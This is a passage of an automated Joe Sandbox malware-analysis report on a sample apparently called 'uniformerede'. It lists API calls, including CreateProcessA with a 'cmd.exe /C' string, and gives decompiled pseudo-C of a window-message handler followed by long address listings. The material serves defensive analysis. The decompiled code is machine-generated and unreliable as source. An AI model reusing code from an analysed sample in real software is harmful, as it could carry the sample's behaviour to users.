                                                                                                                                                                                                                              • Part of subcall function 00409A58: GetFileAttributesA.KERNEL32(00000000,?,00473256,?,?,00000000,00000005,?,00000000,004732A8,?,00000000,00473306), ref: 00409A63
                                                                                                                                                                                                                            • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000044,?,000000F6), ref: 0047549C
                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000044,?,000000F6), ref: 004754AB
                                                                                                                                                                                                                            • ReadFile.KERNEL32(?,?,000000FF,?,00000000,00000000,00475563,?,?,00000000,00000000,00000000,00000000,000000FF,00000000,00000000), ref: 004754DC
                                                                                                                                                                                                                            • OemToCharA.USER32(00000000,00000000), ref: 00475506
                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?,000000FF,?,00000000,00000000,00475563,?,?,00000000,00000000,00000000,00000000,000000FF), ref: 0047553E
                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,0047556A,?,000000FF,?,00000000,00000000,00475563,?,?,00000000,00000000,00000000,00000000,000000FF,00000000), ref: 00475554
                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,0047556A,?,000000FF,?,00000000,00000000,00475563,?,?,00000000,00000000,00000000,00000000,000000FF), ref: 0047555D
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Handle$Close$CreateFile$AttributesCharObjectPipeProcessReadSingleWait
                                                                                                                                                                                                                            • String ID: C:\$D$cmd.exe /C
                                                                                                                                                                                                                            • API String ID: 3269375759-2807548070
                                                                                                                                                                                                                            • Opcode ID: 337c76df8ed0ba55073ab9dc257bd6663246026ec8d7fff9333260b9ae0deff7
                                                                                                                                                                                                                            • Instruction ID: 82437ea0ccec46d2af5a08e72f5cf6232f0238eba76bb00f3cc1c06be9a4dd54
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 337c76df8ed0ba55073ab9dc257bd6663246026ec8d7fff9333260b9ae0deff7
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6E5150B1904608AFDB10EFA5C881BDEB7B8EB48314F51457AF518F72C1DB785E448B68
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0044EA40 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 405nativeCOMMONCrypto
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 91%
                                                                                                                                                                                                                            			E0044EA40(intOrPtr __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				struct HMENU__* _v12;
				signed int _v16;
				char _v17;
				intOrPtr _v24;
				int _v28;
				struct HDC__* _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr* _v48;
				char _v52;
				intOrPtr _t137;
				signed int _t138;
				intOrPtr _t144;
				signed int _t150;
				signed int _t151;
				intOrPtr* _t153;
				void* _t158;
				struct HMENU__* _t160;
				intOrPtr* _t165;
				void* _t173;
				signed int _t177;
				signed int _t181;
				void* _t182;
				void* _t214;
				struct HDC__* _t221;
				void* _t251;
				signed int _t257;
				void* _t265;
				signed int _t271;
				signed int _t272;
				signed int _t274;
				signed int _t275;
				signed int _t277;
				signed int _t278;
				signed int _t280;
				signed int _t281;
				signed int _t283;
				signed int _t284;
				signed int _t286;
				signed int _t287;
				signed int _t290;
				signed int _t291;
				intOrPtr _t307;
				intOrPtr _t311;
				intOrPtr _t333;
				intOrPtr _t342;
				intOrPtr _t346;
				intOrPtr* _t353;
				signed int _t355;
				intOrPtr* _t356;
				signed int _t367;
				signed int _t368;
				signed int _t369;
				signed int _t370;
				signed int _t371;
				signed int _t372;
				signed int _t373;
				intOrPtr* _t375;
				void* _t377;
				void* _t378;
				intOrPtr _t379;
				void* _t380;

				_t377 = _t378;
				_t379 = _t378 + 0xffffffd0;
				_v52 = 0;
				_t375 = __edx;
				_v8 = __eax;
				_push(_t377);
				_push(0x44ef73);
				_push( *[fs:eax]);
				 *[fs:eax] = _t379;
				_t137 =  *__edx;
				_t380 = _t137 - 0x111;
				if(_t380 > 0) {
					_t138 = _t137 - 0x117;
					__eflags = _t138;
					if(_t138 == 0) {
						_t271 =  *((intOrPtr*)(_v8 + 8)) - 1;
						__eflags = _t271;
						if(_t271 < 0) {
							goto L67;
						} else {
							_t272 = _t271 + 1;
							_t367 = 0;
							__eflags = 0;
							while(1) {
								_t150 = E0044DDEC(E0041AC6C(_v8, _t367),  *(_t375 + 4), __eflags);
								__eflags = _t150;
								if(_t150 != 0) {
									goto L68;
								}
								_t367 = _t367 + 1;
								_t272 = _t272 - 1;
								__eflags = _t272;
								if(_t272 != 0) {
									continue;
								} else {
									goto L67;
								}
								goto L68;
							}
						}
					} else {
						_t151 = _t138 - 8;
						__eflags = _t151;
						if(_t151 == 0) {
							_v17 = 0;
							__eflags =  *(__edx + 6) & 0x00000010;
							if(( *(__edx + 6) & 0x00000010) != 0) {
								_v17 = 1;
							}
							_t274 =  *((intOrPtr*)(_v8 + 8)) - 1;
							__eflags = _t274;
							if(__eflags < 0) {
								L32:
								_t153 =  *0x49dbcc; // 0x49ebb8
								E0045B010( *_t153, 0, __eflags);
								goto L67;
							} else {
								_t275 = _t274 + 1;
								_t368 = 0;
								__eflags = 0;
								while(1) {
									__eflags = _v17 - 1;
									if(_v17 != 1) {
										_v12 =  *(_t375 + 4) & 0x0000ffff;
									} else {
										_t160 =  *(_t375 + 8);
										__eflags = _t160;
										if(_t160 == 0) {
											_v12 = 0xffffffff;
										} else {
											_v12 = GetSubMenu(_t160,  *(_t375 + 4) & 0x0000ffff);
										}
									}
									_t158 = E0041AC6C(_v8, _t368);
									_t295 = _v17;
									_v16 = E0044DD30(_t158, _v17, _v12);
									__eflags = _v16;
									if(__eflags != 0) {
										break;
									}
									_t368 = _t368 + 1;
									_t275 = _t275 - 1;
									__eflags = _t275;
									if(__eflags != 0) {
										continue;
									} else {
										goto L32;
									}
									goto L68;
								}
								E004380E0( *((intOrPtr*)(_v16 + 0x58)), _t295,  &_v52, __eflags);
								_t165 =  *0x49dbcc; // 0x49ebb8
								E0045B010( *_t165, _v52, __eflags);
							}
						} else {
							__eflags = _t151 == 1;
							if(_t151 == 1) {
								_t277 =  *((intOrPtr*)(_v8 + 8)) - 1;
								__eflags = _t277;
								if(_t277 < 0) {
									goto L67;
								} else {
									_t278 = _t277 + 1;
									_t369 = 0;
									__eflags = 0;
									while(1) {
										_v48 = E0041AC6C(_v8, _t369);
										_t173 =  *((intOrPtr*)( *_v48 + 0x34))();
										__eflags = _t173 -  *(_t375 + 8);
										if(_t173 ==  *(_t375 + 8)) {
											break;
										}
										_t177 = E0044DD30(_v48, 1,  *(_t375 + 8));
										__eflags = _t177;
										if(_t177 == 0) {
											_t369 = _t369 + 1;
											_t278 = _t278 - 1;
											__eflags = _t278;
											if(_t278 != 0) {
												continue;
											} else {
												goto L67;
											}
										} else {
											break;
										}
										goto L68;
									}
									E0044E630(_v48, _t375);
								}
							} else {
								goto L67;
							}
						}
					}
					goto L68;
				} else {
					if(_t380 == 0) {
						_t280 =  *((intOrPtr*)(_v8 + 8)) - 1;
						__eflags = _t280;
						if(_t280 < 0) {
							goto L67;
						} else {
							_t281 = _t280 + 1;
							_t370 = 0;
							__eflags = 0;
							while(1) {
								E0041AC6C(_v8, _t370);
								_t181 = E0044DDD0( *(_t375 + 4), __eflags);
								__eflags = _t181;
								if(_t181 != 0) {
									goto L68;
								}
								_t370 = _t370 + 1;
								_t281 = _t281 - 1;
								__eflags = _t281;
								if(_t281 != 0) {
									continue;
								} else {
									goto L67;
								}
								goto L68;
							}
						}
						goto L68;
					} else {
						_t182 = _t137 - 0x2b;
						if(_t182 == 0) {
							_v40 =  *((intOrPtr*)(__edx + 8));
							_t283 =  *((intOrPtr*)(_v8 + 8)) - 1;
							__eflags = _t283;
							if(_t283 < 0) {
								goto L67;
							} else {
								_t284 = _t283 + 1;
								_t371 = 0;
								__eflags = 0;
								while(1) {
									_v16 = E0044DD30(E0041AC6C(_v8, _t371), 0,  *((intOrPtr*)(_v40 + 8)));
									__eflags = _v16;
									if(_v16 != 0) {
										break;
									}
									_t371 = _t371 + 1;
									_t284 = _t284 - 1;
									__eflags = _t284;
									if(_t284 != 0) {
										continue;
									} else {
										goto L67;
									}
									goto L69;
								}
								_v24 = E0042572C(0, 1);
								_push(_t377);
								_push(0x44eda6);
								_push( *[fs:eax]);
								 *[fs:eax] = _t379;
								_v28 = SaveDC( *(_v40 + 0x18));
								_push(_t377);
								_push(0x44ed89);
								_push( *[fs:eax]);
								 *[fs:eax] = _t379;
								E00425CE8(_v24,  *(_v40 + 0x18));
								E00425B88(_v24);
								E0044F218(_v16, _v40 + 0x1c, _v24,  *((intOrPtr*)(_v40 + 0x10)));
								_pop(_t333);
								 *[fs:eax] = _t333;
								_push(0x44ed90);
								__eflags = 0;
								E00425CE8(_v24, 0);
								return RestoreDC( *(_v40 + 0x18), _v28);
							}
						} else {
							_t214 = _t182 - 1;
							if(_t214 == 0) {
								_v44 =  *((intOrPtr*)(__edx + 8));
								_t286 =  *((intOrPtr*)(_v8 + 8)) - 1;
								__eflags = _t286;
								if(_t286 < 0) {
									goto L67;
								} else {
									_t287 = _t286 + 1;
									_t372 = 0;
									__eflags = 0;
									while(1) {
										_v16 = E0044DD30(E0041AC6C(_v8, _t372), 0,  *((intOrPtr*)(_v44 + 8)));
										__eflags = _v16;
										if(_v16 != 0) {
											break;
										}
										_t372 = _t372 + 1;
										_t287 = _t287 - 1;
										__eflags = _t287;
										if(_t287 != 0) {
											continue;
										} else {
											goto L67;
										}
										goto L69;
									}
									_t221 =  *((intOrPtr*)(_v8 + 0x10));
									L00407730();
									_v32 = _t221;
									 *[fs:eax] = _t379;
									_v24 = E0042572C(0, 1);
									 *[fs:eax] = _t379;
									_v28 = SaveDC(_v32);
									 *[fs:eax] = _t379;
									E00425CE8(_v24, _v32);
									E00425B88(_v24);
									 *((intOrPtr*)( *_v16 + 0x38))(_v44 + 0x10,  *[fs:eax], 0x44eea7, _t377,  *[fs:eax], 0x44eec4, _t377,  *[fs:eax], 0x44eee9, _t377, _t221);
									_pop(_t342);
									 *[fs:eax] = _t342;
									_push(0x44eeae);
									__eflags = 0;
									E00425CE8(_v24, 0);
									return RestoreDC(_v32, _v28);
								}
							} else {
								if(_t214 == 0x27) {
									_v36 =  *((intOrPtr*)(__edx + 8));
									_t290 =  *((intOrPtr*)(_v8 + 8)) - 1;
									__eflags = _t290;
									if(_t290 < 0) {
										goto L67;
									} else {
										_t291 = _t290 + 1;
										_t373 = 0;
										__eflags = 0;
										while(1) {
											_t251 =  *((intOrPtr*)( *((intOrPtr*)(E0041AC6C(_v8, _t373))) + 0x34))();
											_t346 = _v36;
											__eflags = _t251 -  *((intOrPtr*)(_t346 + 0xc));
											if(_t251 !=  *((intOrPtr*)(_t346 + 0xc))) {
												_v16 = E0044DD30(E0041AC6C(_v8, _t373), 1,  *((intOrPtr*)(_v36 + 0xc)));
											} else {
												_v16 =  *((intOrPtr*)(E0041AC6C(_v8, _t373) + 0x34));
											}
											__eflags = _v16;
											if(_v16 != 0) {
												break;
											}
											_t373 = _t373 + 1;
											_t291 = _t291 - 1;
											__eflags = _t291;
											if(_t291 != 0) {
												continue;
											} else {
												goto L67;
											}
											goto L68;
										}
										_t257 = E0044DD60(E0041AC6C(_v8, _t373), 1,  *((intOrPtr*)(_v36 + 8)));
										__eflags = _t257;
										if(_t257 == 0) {
											_t265 = E0041AC6C(_v8, _t373);
											__eflags = 0;
											_t257 = E0044DD60(_t265, 0,  *((intOrPtr*)(_v36 + 0xc)));
										}
										_t353 =  *0x49de0c; // 0x49ebbc
										_t355 =  *( *_t353 + 0x6c);
										__eflags = _t355;
										if(_t355 != 0) {
											__eflags = _t257;
											if(_t257 == 0) {
												_t257 =  *(_t355 + 0x158);
											}
											_t307 =  *0x49de0c; // 0x49ebbc
											__eflags =  *(_t355 + 0x228) & 0x00000008;
											if(( *(_t355 + 0x228) & 0x00000008) == 0) {
												_t356 =  *0x49dbcc; // 0x49ebb8
												E0045ACB4( *_t356, _t291, _t307, _t257, _t373, _t375);
											} else {
												E0045AD1C();
											}
										}
									}
								} else {
									L67:
									_push( *(_t375 + 8));
									_push( *(_t375 + 4));
									_push( *_t375);
									_t144 =  *((intOrPtr*)(_v8 + 0x10));
									_push(_t144);
									L00407540();
									 *((intOrPtr*)(_t375 + 0xc)) = _t144;
								}
								L68:
								_pop(_t311);
								 *[fs:eax] = _t311;
								_push(0x44ef7a);
								return E004049C0( &_v52);
							}
						}
					}
				}
				L69:
			}



































































                                                                                                                                                                                                                            0x0044ea41
                                                                                                                                                                                                                            0x0044ea43
                                                                                                                                                                                                                            0x0044ea4b
                                                                                                                                                                                                                            0x0044ea4e
                                                                                                                                                                                                                            0x0044ea50
                                                                                                                                                                                                                            0x0044ea55
                                                                                                                                                                                                                            0x0044ea56
                                                                                                                                                                                                                            0x0044ea5b
                                                                                                                                                                                                                            0x0044ea5e
                                                                                                                                                                                                                            0x0044ea61
                                                                                                                                                                                                                            0x0044ea63
                                                                                                                                                                                                                            0x0044ea68
                                                                                                                                                                                                                            0x0044ea8a
                                                                                                                                                                                                                            0x0044ea8a
                                                                                                                                                                                                                            0x0044ea8f
                                                                                                                                                                                                                            0x0044eade
                                                                                                                                                                                                                            0x0044eadf
                                                                                                                                                                                                                            0x0044eae1
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044eae7
                                                                                                                                                                                                                            0x0044eae7
                                                                                                                                                                                                                            0x0044eae8
                                                                                                                                                                                                                            0x0044eae8
                                                                                                                                                                                                                            0x0044eaea
                                                                                                                                                                                                                            0x0044eaf7
                                                                                                                                                                                                                            0x0044eafc
                                                                                                                                                                                                                            0x0044eafe
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044eb04
                                                                                                                                                                                                                            0x0044eb05
                                                                                                                                                                                                                            0x0044eb05
                                                                                                                                                                                                                            0x0044eb06
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044eb08
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044eb08
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044eb06
                                                                                                                                                                                                                            0x0044eaea
                                                                                                                                                                                                                            0x0044ea91
                                                                                                                                                                                                                            0x0044ea91
                                                                                                                                                                                                                            0x0044ea91
                                                                                                                                                                                                                            0x0044ea94
                                                                                                                                                                                                                            0x0044eb0d
                                                                                                                                                                                                                            0x0044eb11
                                                                                                                                                                                                                            0x0044eb15
                                                                                                                                                                                                                            0x0044eb17
                                                                                                                                                                                                                            0x0044eb17
                                                                                                                                                                                                                            0x0044eb21
                                                                                                                                                                                                                            0x0044eb22
                                                                                                                                                                                                                            0x0044eb24
                                                                                                                                                                                                                            0x0044eb9a
                                                                                                                                                                                                                            0x0044eb9a
                                                                                                                                                                                                                            0x0044eba3
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044eb26
                                                                                                                                                                                                                            0x0044eb26
                                                                                                                                                                                                                            0x0044eb27
                                                                                                                                                                                                                            0x0044eb27
                                                                                                                                                                                                                            0x0044eb29
                                                                                                                                                                                                                            0x0044eb29
                                                                                                                                                                                                                            0x0044eb2d
                                                                                                                                                                                                                            0x0044eb53
                                                                                                                                                                                                                            0x0044eb2f
                                                                                                                                                                                                                            0x0044eb2f
                                                                                                                                                                                                                            0x0044eb32
                                                                                                                                                                                                                            0x0044eb34
                                                                                                                                                                                                                            0x0044eb46
                                                                                                                                                                                                                            0x0044eb36
                                                                                                                                                                                                                            0x0044eb41
                                                                                                                                                                                                                            0x0044eb41
                                                                                                                                                                                                                            0x0044eb34
                                                                                                                                                                                                                            0x0044eb5b
                                                                                                                                                                                                                            0x0044eb60
                                                                                                                                                                                                                            0x0044eb6b
                                                                                                                                                                                                                            0x0044eb6e
                                                                                                                                                                                                                            0x0044eb72
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044eb96
                                                                                                                                                                                                                            0x0044eb97
                                                                                                                                                                                                                            0x0044eb97
                                                                                                                                                                                                                            0x0044eb98
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044eb98
                                                                                                                                                                                                                            0x0044eb7d
                                                                                                                                                                                                                            0x0044eb85
                                                                                                                                                                                                                            0x0044eb8c
                                                                                                                                                                                                                            0x0044eb8c
                                                                                                                                                                                                                            0x0044ea96
                                                                                                                                                                                                                            0x0044ea96
                                                                                                                                                                                                                            0x0044ea97
                                                                                                                                                                                                                            0x0044ef00
                                                                                                                                                                                                                            0x0044ef01
                                                                                                                                                                                                                            0x0044ef03
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044ef05
                                                                                                                                                                                                                            0x0044ef05
                                                                                                                                                                                                                            0x0044ef06
                                                                                                                                                                                                                            0x0044ef06
                                                                                                                                                                                                                            0x0044ef08
                                                                                                                                                                                                                            0x0044ef12
                                                                                                                                                                                                                            0x0044ef1a
                                                                                                                                                                                                                            0x0044ef1d
                                                                                                                                                                                                                            0x0044ef20
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044ef2a
                                                                                                                                                                                                                            0x0044ef2f
                                                                                                                                                                                                                            0x0044ef31
                                                                                                                                                                                                                            0x0044ef3f
                                                                                                                                                                                                                            0x0044ef40
                                                                                                                                                                                                                            0x0044ef40
                                                                                                                                                                                                                            0x0044ef41
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044ef31
                                                                                                                                                                                                                            0x0044ef38
                                                                                                                                                                                                                            0x0044ef38
                                                                                                                                                                                                                            0x0044ea9d
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044ea9d
                                                                                                                                                                                                                            0x0044ea97
                                                                                                                                                                                                                            0x0044ea94
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044ea6a
                                                                                                                                                                                                                            0x0044ea6a
                                                                                                                                                                                                                            0x0044eaa8
                                                                                                                                                                                                                            0x0044eaa9
                                                                                                                                                                                                                            0x0044eaab
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044eab1
                                                                                                                                                                                                                            0x0044eab1
                                                                                                                                                                                                                            0x0044eab2
                                                                                                                                                                                                                            0x0044eab2
                                                                                                                                                                                                                            0x0044eab4
                                                                                                                                                                                                                            0x0044eab9
                                                                                                                                                                                                                            0x0044eac2
                                                                                                                                                                                                                            0x0044eac7
                                                                                                                                                                                                                            0x0044eac9
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044eacf
                                                                                                                                                                                                                            0x0044ead0
                                                                                                                                                                                                                            0x0044ead0
                                                                                                                                                                                                                            0x0044ead1
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044ead3
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044ead3
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044ead1
                                                                                                                                                                                                                            0x0044eab4
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044ea6c
                                                                                                                                                                                                                            0x0044ea6c
                                                                                                                                                                                                                            0x0044ea6f
                                                                                                                                                                                                                            0x0044ecb2
                                                                                                                                                                                                                            0x0044ecbb
                                                                                                                                                                                                                            0x0044ecbc
                                                                                                                                                                                                                            0x0044ecbe
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044ecc4
                                                                                                                                                                                                                            0x0044ecc4
                                                                                                                                                                                                                            0x0044ecc5
                                                                                                                                                                                                                            0x0044ecc5
                                                                                                                                                                                                                            0x0044ecc7
                                                                                                                                                                                                                            0x0044ecde
                                                                                                                                                                                                                            0x0044ece1
                                                                                                                                                                                                                            0x0044ece5
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044edad
                                                                                                                                                                                                                            0x0044edae
                                                                                                                                                                                                                            0x0044edae
                                                                                                                                                                                                                            0x0044edaf
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044edb5
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044edb5
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044edaf
                                                                                                                                                                                                                            0x0044ecf7
                                                                                                                                                                                                                            0x0044ecfc
                                                                                                                                                                                                                            0x0044ecfd
                                                                                                                                                                                                                            0x0044ed02
                                                                                                                                                                                                                            0x0044ed05
                                                                                                                                                                                                                            0x0044ed14
                                                                                                                                                                                                                            0x0044ed19
                                                                                                                                                                                                                            0x0044ed1a
                                                                                                                                                                                                                            0x0044ed1f
                                                                                                                                                                                                                            0x0044ed22
                                                                                                                                                                                                                            0x0044ed2e
                                                                                                                                                                                                                            0x0044ed43
                                                                                                                                                                                                                            0x0044ed5c
                                                                                                                                                                                                                            0x0044ed63
                                                                                                                                                                                                                            0x0044ed66
                                                                                                                                                                                                                            0x0044ed69
                                                                                                                                                                                                                            0x0044ed6e
                                                                                                                                                                                                                            0x0044ed73
                                                                                                                                                                                                                            0x0044ed88
                                                                                                                                                                                                                            0x0044ed88
                                                                                                                                                                                                                            0x0044ea75
                                                                                                                                                                                                                            0x0044ea75
                                                                                                                                                                                                                            0x0044ea76
                                                                                                                                                                                                                            0x0044edbd
                                                                                                                                                                                                                            0x0044edc6
                                                                                                                                                                                                                            0x0044edc7
                                                                                                                                                                                                                            0x0044edc9
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044edcf
                                                                                                                                                                                                                            0x0044edcf
                                                                                                                                                                                                                            0x0044edd0
                                                                                                                                                                                                                            0x0044edd0
                                                                                                                                                                                                                            0x0044edd2
                                                                                                                                                                                                                            0x0044ede9
                                                                                                                                                                                                                            0x0044edec
                                                                                                                                                                                                                            0x0044edf0
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044eef0
                                                                                                                                                                                                                            0x0044eef1
                                                                                                                                                                                                                            0x0044eef1
                                                                                                                                                                                                                            0x0044eef2
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044eef8
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044eef8
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044eef2
                                                                                                                                                                                                                            0x0044edf9
                                                                                                                                                                                                                            0x0044edfd
                                                                                                                                                                                                                            0x0044ee02
                                                                                                                                                                                                                            0x0044ee10
                                                                                                                                                                                                                            0x0044ee1f
                                                                                                                                                                                                                            0x0044ee2d
                                                                                                                                                                                                                            0x0044ee39
                                                                                                                                                                                                                            0x0044ee47
                                                                                                                                                                                                                            0x0044ee50
                                                                                                                                                                                                                            0x0044ee65
                                                                                                                                                                                                                            0x0044ee7f
                                                                                                                                                                                                                            0x0044ee84
                                                                                                                                                                                                                            0x0044ee87
                                                                                                                                                                                                                            0x0044ee8a
                                                                                                                                                                                                                            0x0044ee8f
                                                                                                                                                                                                                            0x0044ee94
                                                                                                                                                                                                                            0x0044eea6
                                                                                                                                                                                                                            0x0044eea6
                                                                                                                                                                                                                            0x0044ea7c
                                                                                                                                                                                                                            0x0044ea7f
                                                                                                                                                                                                                            0x0044ebb0
                                                                                                                                                                                                                            0x0044ebb9
                                                                                                                                                                                                                            0x0044ebba
                                                                                                                                                                                                                            0x0044ebbc
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044ebc2
                                                                                                                                                                                                                            0x0044ebc2
                                                                                                                                                                                                                            0x0044ebc3
                                                                                                                                                                                                                            0x0044ebc3
                                                                                                                                                                                                                            0x0044ebc5
                                                                                                                                                                                                                            0x0044ebd1
                                                                                                                                                                                                                            0x0044ebd4
                                                                                                                                                                                                                            0x0044ebd7
                                                                                                                                                                                                                            0x0044ebda
                                                                                                                                                                                                                            0x0044ec05
                                                                                                                                                                                                                            0x0044ebdc
                                                                                                                                                                                                                            0x0044ebe9
                                                                                                                                                                                                                            0x0044ebe9
                                                                                                                                                                                                                            0x0044ec08
                                                                                                                                                                                                                            0x0044ec0c
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044eca2
                                                                                                                                                                                                                            0x0044eca3
                                                                                                                                                                                                                            0x0044eca3
                                                                                                                                                                                                                            0x0044eca4
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044ecaa
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044ecaa
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044eca4
                                                                                                                                                                                                                            0x0044ec24
                                                                                                                                                                                                                            0x0044ec29
                                                                                                                                                                                                                            0x0044ec2b
                                                                                                                                                                                                                            0x0044ec32
                                                                                                                                                                                                                            0x0044ec3d
                                                                                                                                                                                                                            0x0044ec3f
                                                                                                                                                                                                                            0x0044ec3f
                                                                                                                                                                                                                            0x0044ec44
                                                                                                                                                                                                                            0x0044ec4c
                                                                                                                                                                                                                            0x0044ec4f
                                                                                                                                                                                                                            0x0044ec51
                                                                                                                                                                                                                            0x0044ec57
                                                                                                                                                                                                                            0x0044ec59
                                                                                                                                                                                                                            0x0044ec60
                                                                                                                                                                                                                            0x0044ec60
                                                                                                                                                                                                                            0x0044ec66
                                                                                                                                                                                                                            0x0044ec6c
                                                                                                                                                                                                                            0x0044ec73
                                                                                                                                                                                                                            0x0044ec8f
                                                                                                                                                                                                                            0x0044ec98
                                                                                                                                                                                                                            0x0044ec75
                                                                                                                                                                                                                            0x0044ec85
                                                                                                                                                                                                                            0x0044ec85
                                                                                                                                                                                                                            0x0044ec73
                                                                                                                                                                                                                            0x0044ec51
                                                                                                                                                                                                                            0x0044ea85
                                                                                                                                                                                                                            0x0044ef43
                                                                                                                                                                                                                            0x0044ef46
                                                                                                                                                                                                                            0x0044ef4a
                                                                                                                                                                                                                            0x0044ef4d
                                                                                                                                                                                                                            0x0044ef51
                                                                                                                                                                                                                            0x0044ef54
                                                                                                                                                                                                                            0x0044ef55
                                                                                                                                                                                                                            0x0044ef5a
                                                                                                                                                                                                                            0x0044ef5a
                                                                                                                                                                                                                            0x0044ef5d
                                                                                                                                                                                                                            0x0044ef5f
                                                                                                                                                                                                                            0x0044ef62
                                                                                                                                                                                                                            0x0044ef65
                                                                                                                                                                                                                            0x0044ef72
                                                                                                                                                                                                                            0x0044ef72
                                                                                                                                                                                                                            0x0044ea76
                                                                                                                                                                                                                            0x0044ea6f
                                                                                                                                                                                                                            0x0044ea6a
                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • SaveDC.GDI32(?), ref: 0044ED0F
                                                                                                                                                                                                                            • RestoreDC.GDI32(?,?), ref: 0044ED83
                                                                                                                                                                                                                            • 73C9B080.USER32(?,00000000,0044EF73), ref: 0044EDFD
                                                                                                                                                                                                                            • SaveDC.GDI32(?), ref: 0044EE34
                                                                                                                                                                                                                            • RestoreDC.GDI32(?,?), ref: 0044EEA1
                                                                                                                                                                                                                            • NtdllDefWindowProc_A.USER32(?,?,?,?,00000000,0044EF73), ref: 0044EF55
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
